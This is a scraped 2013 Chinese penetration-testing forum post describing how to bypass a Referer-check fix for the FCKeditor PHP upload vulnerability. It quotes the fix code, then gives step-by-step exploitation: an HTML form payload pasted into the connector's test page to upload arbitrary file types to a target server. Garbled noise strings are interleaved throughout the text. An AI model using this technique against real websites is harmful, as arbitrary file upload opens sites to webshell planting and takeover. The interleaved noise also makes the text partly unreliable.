中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
) G& }+ Y' M1 ^, B3 s# C
网上给出的修复方案是
9 l4 X- t; A+ g# p: r6 w
修复方法,删除FCK编辑器用其他的编辑器
1 E+ D% N$ a7 |# V
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
* l3 \; [' M2 o" d
在
" k( E! s F1 d6 o9 }5 r8 f4 ?) a
require(‘config.php’);
5 ?" I* ^* l. h
require(‘util.php’);
1 B# }! O9 Z# X! m: I
的下面添加以下代码—————————–
3 e, Y$ h3 d8 _& e3 D
//防止外部提交
% d' l( i) {( v5 @# t0 }
function outsidepost()
2 P% L; J# G9 W2 J# I4 q5 C4 t. s o
{
N" z% ~0 h6 L5 N* H3 J& ?: n3 y
$servername=$_SERVER['SERVER_NAME'];
3 T, h* t# k6 u4 P W' Z! U
$sub_from=@$_SERVER['HTTP_REFERER'];
5 q5 N# O. b1 L) N
$sub_len=strlen($servername);
$ Q2 q' }2 p2 n9 K. k1 m0 I0 K8 E
$checkfrom=substr($sub_from,7,$sub_len);
! K0 Q7 ]! N4 @4 z1 n2 @8 C
if($checkfrom!=$servername){
4 x. Z6 V# P/ I; t' E' [
echo(“you don’t outsidepost!”);
( d9 A$ z1 p0 g
exit;
/ A7 N1 e! X, e) q) ~& y5 X
}
/ M) e7 B! e% }7 J7 u
}
: h, J% E; `7 H: I# L
outsidepost();
7 N" P- f. x7 x( j1 W
防止外部提交,但是没有防止内部提交,
8 ]) ~% S- F( k* n* u
利用方法:
/ b3 ?- c" u# P& y
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
7 m* l- n' U+ w, |- w* K
2,在Current Folder 框输入
' ]% \7 Z" E, Z7 K7 b
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
0 D! Y5 S5 M. M, p( Y2 E! W
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
( v) O: x: ?) ]0 l: D
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2